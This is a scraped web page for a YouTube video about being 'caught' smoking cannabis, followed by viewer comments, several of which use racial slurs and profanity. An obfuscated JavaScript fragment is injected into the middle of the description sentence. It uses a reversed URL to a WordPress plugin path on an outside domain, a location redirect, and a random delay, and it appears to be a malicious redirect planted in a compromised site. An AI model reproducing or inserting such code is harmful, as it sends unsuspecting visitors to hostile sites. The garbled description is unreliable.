This video is intended for legal cannabis patients & adults. Legal Michigan Medical Marijuana Patient. I was just streaming and then my aunts and uncles came over toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to my house xD.

Youtube Channel

26 thoughts on “CAUGHT SMOKING WEED!”

  1. Brooke Cole says:

    What's your sc?

  2. LostMyst says:

    yo how do you let the smoke out and suck it back in at 13:57

  3. Pika Stealth says:

    Your white stop saying nigga

  4. Pull up nigga says:

    How do you act so fucking sober bro one time i came home fuckin gone and like 3 of my dam aunt n uncles were there and i was playin that shit off so bad

  5. ryan says:


  6. Jonas says:

    you real as fuck, keep it up!

  7. Nature says:

    real g

  8. T&R reptiles says:

    Stupid as shit

  9. Trikol says:

    your parents care if u smoke weed?

  10. Drew Berning says:

    If u got a med card then why r u trying to hide it

  11. Blasterblade Librator says:

    YouTube captions are just as high as him. Lol

  12. Hanna Miller says:


  13. skyler chatterton says:

    Bro u cool but don’t say nigga

  14. Ghost Face says:

    did this bitch say nigga? fuck him

  15. isaac preseau says:

    Charlevoix MI need shit right here lmao

  16. A'liyah bazan says:

    why the fuck is this 33 mins, wtf lol

  17. ari ferrari says:

    dont say nigga

  18. I'm a really fun boy. says:

    Stop saying nigga. The fuck you think this is?

  19. Trevor Wilson says:

    Wait where are u actually caught I'm watching the whole thing but don't see where ur caught…?

  20. unknown says:


    sorry for you, thats why i onlys moke cigs

  21. UncommonSituations says:

    Bruh this funny as hell. I'm from milford, near Detroit

  22. Mr.FinPC says:

    A few weeks ago my mom told me that my step dad and my grandpa are going to bring a mattress over. I had smoked at least 1 great when hearing this. Thank God it was sativa. I used over a pound in cologne and nothing was gone. Anti smoke and all. Soon enough I cleared my room it was as dank as a grow house and they came over. If they went into my room my whole house would be in trouble

  23. Sea says:

    the fun starts at 19:00

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